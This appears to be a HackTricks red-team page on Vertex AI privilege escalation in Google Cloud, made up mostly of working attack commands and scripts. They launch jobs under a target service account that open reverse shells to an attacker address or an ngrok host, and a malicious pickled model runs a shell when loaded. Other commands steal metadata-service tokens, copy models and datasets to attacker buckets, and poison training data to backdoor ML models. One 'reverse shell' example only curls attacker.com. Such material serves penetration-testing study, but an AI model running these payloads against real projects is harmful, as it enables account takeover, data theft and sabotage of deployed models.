GCP - Vertex AI Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Vertex AI

For more information about Vertex AI check:

GCP - Vertex AI Enum

aiplatform.customJobs.create, iam.serviceAccounts.actAs

With the aiplatform.customJobs.create permission and iam.serviceAccounts.actAs on a target service account, an attacker can execute arbitrary code with elevated privileges.

This works by creating a custom training job that runs attacker-controlled code (either a custom container or Python package). By specifying a privileged service account via the --service-account flag, the job inherits that service account’s permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account’s OAuth access token.

Impact: Full privilege escalation to the target service account’s permissions.

Create custom job with reverse shell
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"curl http://attacker.com" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
# nc -lvnp 4444
# Once connected, you can extract the token with:
# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
Alternative: Extract token from logs
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=token-exfil-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
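
Once you have the OAuth access token of the target service account, you can use it directly against Google APIs. A minimal sketch (assuming you copied the token into the TOKEN variable; the project ID is a placeholder):

# Use the stolen token directly against REST APIs
TOKEN="<stolen-access-token>"
curl -s -H "Authorization: Bearer ${TOKEN}" \
  "https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>"

# Or let gcloud consume it (recent gcloud versions honour this env var)
CLOUDSDK_AUTH_ACCESS_TOKEN="${TOKEN}" gcloud projects get-iam-policy <project-id>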

aiplatform.models.upload, aiplatform.models.get

This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through an endpoint deployment or a batch prediction job.

Note

To perform this attack you need a world-readable GCS bucket, or the ability to create a new one, to which you can upload the model artifacts.

Upload malicious pickled model with reverse shell
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/malicious-model/ \
  --display-name=malicious-sklearn \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
Upload model with container reverse shell
# Method 2: use --container-args to run a persistent reverse shell

# Generate a dummy model file to stage in a storage bucket (the payload lives in the container args, not the model)
python3 -c 'import pickle; pickle.dump({}, open("model.pkl", "wb"))'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://any-bucket/dummy-path/ \
  --display-name=revshell-model \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
  --container-command=sh \
  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
  --container-health-route=/ \
  --container-predict-route=/predict \
  --container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

[!DANGER] After uploading the malicious model an attacker could wait for someone to use the model, or launch the model themselves via an endpoint deployment or a batch prediction job.

iam.serviceAccounts.actAs, (aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get) or (aiplatform.endpoints.setIamPolicy)

If you have permissions to create and deploy models to endpoints, or to modify endpoint IAM policies, you can leverage malicious models already uploaded in the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models via an endpoint, all you need to do is the following (a setIamPolicy-based sketch follows the deployment commands):

Deploy malicious model to endpoint
# Create an endpoint
gcloud ai endpoints create \
  --region=<region> \
  --display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
  --region=<region> \
  --model=<model-id> \
  --display-name=revshell-deployment \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
  --machine-type=n1-standard-2 \
  --min-replica-count=1
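
If you only hold aiplatform.endpoints.setIamPolicy, an alternative path is to grant yourself (or a principal you control) a role over an existing endpoint and then deploy the malicious model with that access. The call below follows the standard GCP setIamPolicy REST pattern; the role and member are illustrative assumptions:

# Grant an attacker-controlled principal control over the endpoint (overwrites the existing policy)
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://<region>-aiplatform.googleapis.com/v1/projects/<project-id>/locations/<region>/endpoints/<endpoint-id>:setIamPolicy" \
  -d '{
    "policy": {
      "bindings": [
        {"role": "roles/aiplatform.admin", "members": ["user:attacker@example.com"]}
      ]
    }
  }'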

aiplatform.batchPredictionJobs.create, iam.serviceAccounts.actAs

If you have permission to create batch prediction jobs and run them with a service account, you can access the metadata service. The malicious code executes from a custom prediction container or a malicious model during the batch prediction process.

Note: Batch prediction jobs can only be created via REST API or Python SDK (no gcloud CLI support).

Note

This attack requires first uploading a malicious model (see aiplatform.models.upload section above) or using a custom prediction container with your reverse shell code.

Create batch prediction job with malicious model
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/dummy-model/ \
  --display-name=batch-revshell-model \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
  --container-command=sh \
  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
  --container-health-route=/ \
  --container-predict-route=/predict \
  --container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
  -d '{
    "displayName": "batch-exfil-job",
    "model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
    "inputConfig": {
      "instancesFormat": "jsonl",
      "gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
    },
    "outputConfig": {
      "predictionsFormat": "jsonl",
      "gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
    },
    "dedicatedResources": {
      "machineSpec": {
        "machineType": "n1-standard-2"
      },
      "startingReplicaCount": 1,
      "maxReplicaCount": 1
    },
    "serviceAccount": "'${TARGET_SA}'"
  }'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
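
Since there is no gcloud support, the same job can also be created with the Python SDK. A minimal sketch (assuming the google-cloud-aiplatform package; bucket paths, project, and IDs are placeholders):

# batch_privesc.py - create the batch prediction job via the Vertex AI Python SDK
from google.cloud import aiplatform

aiplatform.init(project="your-project", location="us-central1")

# The reverse shell fires when the prediction container of the malicious model starts
aiplatform.BatchPredictionJob.create(
    job_display_name="batch-exfil-job",
    model_name="projects/your-project/locations/us-central1/models/<model-id-from-step-1>",
    instances_format="jsonl",
    predictions_format="jsonl",
    gcs_source="gs://your-bucket/batch-input.jsonl",
    gcs_destination_prefix="gs://your-bucket/output/",
    machine_type="n1-standard-2",
    starting_replica_count=1,
    max_replica_count=1,
    service_account="target-sa@your-project.iam.gserviceaccount.com",
    sync=False,  # return immediately instead of waiting for the job to finish
)
print("Batch prediction job submitted; wait for the container to start")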

aiplatform.models.export

If you have the models.export permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.

Note

To perform this attack you need a world-readable/writable GCS bucket, or the ability to create a new one, to receive the exported model artifacts.

Export model artifacts to GCS bucket
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
  -d '{
    "outputConfig": {
      "exportFormatId": "custom-trained",
      "artifactDestination": {
        "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
      }
    }
  }'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
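
Rather than waiting blindly, you can poll the long-running operation returned by the export call (its "name" field) until it reports done, for example:

# Poll the export operation until the response contains "done": true
OPERATION="<operation-name-from-export-response>"   # e.g. projects/.../locations/.../models/.../operations/123
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/${OPERATION}"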

aiplatform.pipelineJobs.create, iam.serviceAccounts.actAs

Create ML pipeline jobs that execute multiple steps with arbitrary containers and achieve privilege escalation through reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.

Note

You need a world writable GCS bucket to use as the pipeline root.

Install Vertex AI SDK
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Create pipeline job with reverse shell container
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<sa-email>"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {
        "name": "data-processing-pipeline"
    },
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {
                        "name": "process-task"
                    },
                    "componentRef": {
                        "name": "comp-process"
                    }
                }
            }
        }
    },
    "components": {
        "comp-process": {
            "executorLabel": "exec-process"
        }
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {
        "gcsOutputDirectory": "gs://gstorage-name/folder"
    },
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True,
    text=True,
    check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print(f"✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print(f"  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")

aiplatform.hyperparameterTuningJobs.create, iam.serviceAccounts.actAs

Create hyperparameter tuning jobs that execute arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs allow you to run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and associating it with a privileged service account, you can achieve privilege escalation.

Impact: Full privilege escalation to the target service account’s permissions.

Create hyperparameter tuning job with reverse shell
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
    - metricId: accuracy
      goal: MAXIMIZE
  parameters:
    - parameterId: learning_rate
      doubleValueSpec:
        minValue: 0.001
        maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
    - machineSpec:
        machineType: n1-standard-4
      replicaCount: 1
      containerSpec:
        imageUri: python:3.11-slim
        command: ["python3"]
        args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
  --region=<region> \
  --display-name=hyperparameter-optimization \
  --config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.datasets.export

Export datasets to exfiltrate training data that may contain sensitive information.

Note: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data which may include PII, confidential business data, or other sensitive information that was used to train production models.

Export dataset to exfiltrate training data
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
  -d '{
    "exportConfig": {
      "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
    }
  }'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl

# The exported data may contain:
# - References to training images/files in GCS buckets
# - Dataset annotations and labels
# - PII (Personally Identifiable Information)
# - Sensitive business data
# - Internal documents or communications
# - Credentials or API keys in text data
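
The export can also be driven from the Python SDK. A minimal sketch, assuming an image dataset (use the dataset class matching the data type; project, region, and bucket are placeholders):

# export_dataset.py - export a dataset with the Vertex AI Python SDK
from google.cloud import aiplatform

aiplatform.init(project="your-project", location="us-central1")

# Use the class matching the dataset type (ImageDataset, TextDataset, TabularDataset, ...)
dataset = aiplatform.ImageDataset("<target-dataset-id>")

# Writes the export files to a bucket you control and returns their GCS paths
exported_files = dataset.export_data(output_dir="gs://your-controlled-bucket/exported-data/")
print(exported_files)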

aiplatform.datasets.import

Import malicious or poisoned data into existing datasets to manipulate model training and introduce backdoors.

Note: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).

By importing crafted data into a dataset used for training ML models, an attacker can:

  • Introduce backdoors into models (trigger-based misclassification)
  • Poison training data to degrade model performance
  • Inject data to cause models to leak information
  • Manipulate model behavior for specific inputs

This attack is particularly effective when targeting datasets used for:

  • Image classification (inject mislabeled images)
  • Text classification (inject biased or malicious text)
  • Object detection (manipulate bounding boxes)
  • Recommendation systems (inject fake preferences)
Import poisoned data into dataset
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
  -d '{
    "importConfigs": [
      {
        "gcsSource": {
          "uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
        },
        "importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
      }
    ]
  }'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import
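
The same import can be performed with the Python SDK; a sketch for a single-label image classification dataset (the schema constant below is exposed by the SDK, other values are placeholders):

# import_poison.py - import poisoned data with the Vertex AI Python SDK
from google.cloud import aiplatform
from google.cloud.aiplatform import schema

aiplatform.init(project="your-project", location="us-central1")

dataset = aiplatform.ImageDataset("<target-dataset-id>")

dataset.import_data(
    gcs_source=["gs://your-bucket/poison/poisoned_data.jsonl"],
    import_schema_uri=schema.dataset.ioformat.image.single_label_classification,
    sync=True,  # block until the import operation completes
)
print(dataset.resource_name)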

Attack Scenarios:

Backdoor attack - Image classification
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
Label flipping attack
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" 
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
Data poisoning for model extraction
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
Targeted attack on specific entities
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF

[!DANGER] Data poisoning attacks can have severe consequences:

  • Security systems: Bypass facial recognition or anomaly detection
  • Fraud detection: Train models to ignore specific fraud patterns
  • Content moderation: Cause harmful content to be classified as safe
  • Medical AI: Misclassify critical health conditions
  • Autonomous systems: Manipulate object detection for safety-critical decisions

Impact:

  • Backdoored models that misclassify on specific triggers
  • Degraded model performance and accuracy
  • Biased models that discriminate against certain inputs
  • Information leakage through model behavior
  • Long-term persistence (models trained on poisoned data will inherit the backdoor)

aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs

Warning

Deprecated API: The aiplatform.notebookExecutionJobs.create API is deprecated as part of the Vertex AI Workbench Managed Notebooks deprecation. The modern approach is the Vertex AI Workbench Executor, which schedules notebook runs on Vertex AI custom training infrastructure with a specified service account and is essentially a convenience wrapper around aiplatform.customJobs.create (already documented above). For privilege escalation via notebooks, prefer the aiplatform.customJobs.create method documented above: it is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
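
For reference, a sketch of that modern path: run the notebook through a custom job (the same primitive the Workbench Executor uses), installing papermill at runtime. The bucket paths are assumptions and the container image mirrors the earlier custom job examples:

gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=notebook-exec-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"pip install papermill && gsutil cp gs://<bucket>/malicious.ipynb . && papermill malicious.ipynb executed.ipynb && gsutil cp executed.ipynb gs://<bucket>/output/" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com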

The following technique is provided for historical context only and is not recommended for use in new assessments.

Create notebook execution jobs that run Jupyter notebooks with arbitrary code.

Notebook jobs are ideal for interactive-style code execution with a service account, as they support Python code cells and shell commands.

Create malicious notebook file
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "metadata": {},
      "outputs": [],
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4,
  "nbformat_minor": 5
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
Execute notebook with target service account
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"


curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
  -d '{
    "displayName": "data-analysis-job",
    "gcsNotebookSource": {
      "uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
    },
    "gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
    "serviceAccount": "'${TARGET_SA}'",
    "executionTimeout": "3600s"
  }'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
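
When the execution finishes, the executed notebook (including cell outputs with the printed token) is written under the gcsOutputUri prefix. The exact folder layout may vary, so listing first is a safe sketch:

# Retrieve the executed notebook and grep for the access token (tokens start with ya29)
gsutil ls -r gs://deleteme20u9843rhfioue/output/
gsutil cat gs://deleteme20u9843rhfioue/output/<path-to-executed>.ipynb | grep -o 'ya29[^"]*'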

